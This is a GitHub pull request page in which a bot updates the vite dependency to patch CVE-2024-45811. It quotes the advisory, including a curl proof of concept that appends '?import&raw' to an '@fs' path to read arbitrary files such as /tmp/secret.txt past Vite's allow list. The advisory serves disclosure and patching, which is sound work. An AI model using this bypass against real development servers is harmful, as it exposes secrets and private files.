Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Update dependency vite to v5.4.6 [SECURITY] #2096

Merged
merged 1 commit into from
Sep 17, 2024
Merged

Update dependency vite to v5.4.6 [SECURITY] #2096

merged 1 commit into from
Sep 17, 2024

Conversation

gardener-ci-robot
Copy link
Contributor

@gardener-ci-robot gardener-ci-robot commented Sep 17, 2024
edited
Loading

This PR contains the following updates:

Package Type Update Change
vite (source) devDependencies patch 5.4.2 -> 5.4.6

GitHub Vulnerability Alerts

CVE-2024-45811

Summary

The contents of arbitrary files can be returned to the browser.

Details

@fs denies access to files outside of Vite serving allow list. Adding ?import&raw to the URL bypasses this limitation and returns the file content if it exists.

PoC

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@​fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@&#8203;fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...

Release Notes

vitejs/vite (vite)

v5.4.6

Compare Source

Please refer to CHANGELOG.md for details.

v5.4.5

Compare Source

Please refer to CHANGELOG.md for details.

v5.4.4

Compare Source

Please refer to CHANGELOG.md for details.

v5.4.3

Compare Source

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR has been generated by Renovate Bot.

@gardener-ci-robot gardener-ci-robot added kind/enhancement Enhancement, improvement, extension renovate labels Sep 17, 2024
@gardener-robot
Copy link

@gardener-ci-robot Thank you for your contribution.

@gardener-robot gardener-robot added needs/review Needs review size/s Size of pull request is small (see gardener-robot robot/bots/size.py) labels Sep 17, 2024
@gardener-robot-ci-3 gardener-robot-ci-3 added the reviewed/ok-to-test Has approval for testing (check PR in detail before setting this label because PR is run on CI/CD) label Sep 17, 2024
@gardener-robot-ci-1 gardener-robot-ci-1 added needs/ok-to-test Needs approval for testing (check PR in detail before setting this label because PR is run on CI/CD) and removed reviewed/ok-to-test Has approval for testing (check PR in detail before setting this label because PR is run on CI/CD) labels Sep 17, 2024
@gardener-ci-robot gardener-ci-robot merged commit 9016659 into master Sep 17, 2024
5 checks passed
@gardener-ci-robot gardener-ci-robot deleted the renovate/npm-vite-vulnerability branch September 17, 2024 19:29
@gardener-robot gardener-robot added the status/closed Issue is closed (either delivered or triaged) label Sep 17, 2024
holgerkoser added a commit that referenced this pull request Sep 20, 2024
@holgerkoser
Merge branch 'master' into enh/eslint-plugin-security
a337100 
# By Gardener Prow Robot (50) and others
# Via GitHub
* master: (62 commits)
  Update dependency codemirror to v5.65.18 (#2101)
  Update dependency vite to v5.4.6 [SECURITY] (#2096)
  Fix issues with hibernation schedule dialog (#2076)
  Hide SSH keypair rotation when SSH access disabled (#2077)
  remove unnecessary model-value binding (#2080)
  Fix vite warning (#2090)
  Update dependency vuetify to v3.7.2 (#2095)
  Update vueuse monorepo to v11.1.0 (#2094)
  Update dependency @vueuse/core to v11.1.0 (#2091)
  Update dependency chokidar to v4 (#2081)
  Update dependency @fontsource/roboto to v5.1.0 (#2078)
  Update dependency jose to v5.9.2 (#2087)
  Update dependency express to v4.20.0 [SECURITY] (#2084)
  Update dependency vue to v3.5.6 (#2089)
  Update Yarn to v4.5.0 (#2088)
  Update dependency vue to v3.5.5 (#2086)
  Update dependency vue-router to v4.4.5 (#2083)
  Update dependency express-static-gzip to v2.1.8 (#2082)
  Update dependency vue-router to v4.4.4 (#2075)
  Update dependency openid-client to v5.7.0 (#2069)
  ...

# Conflicts:
#	.pnp.cjs
#	backend/package.json
#	frontend/package.json
#	frontend/src/components/ShootAddons/GManageAddons.vue
#	packages/kube-client/package.json
#	packages/kube-config/package.json
#	packages/logger/package.json
#	packages/monitor/package.json
#	packages/request/package.json
#	yarn.lock
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@grolu grolu Awaiting requested review from grolu grolu is a code owner

@holgerkoser holgerkoser Awaiting requested review from holgerkoser holgerkoser is a code owner

@petersutter petersutter Awaiting requested review from petersutter petersutter is a code owner

Assignees
No one assigned
Labels
kind/enhancement Enhancement, improvement, extension needs/ok-to-test Needs approval for testing (check PR in detail before setting this label because PR is run on CI/CD) needs/review Needs review renovate size/s Size of pull request is small (see gardener-robot robot/bots/size.py) status/closed Issue is closed (either delivered or triaged)
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
4 participants
@gardener-ci-robot @gardener-robot @gardener-robot-ci-1 @gardener-robot-ci-3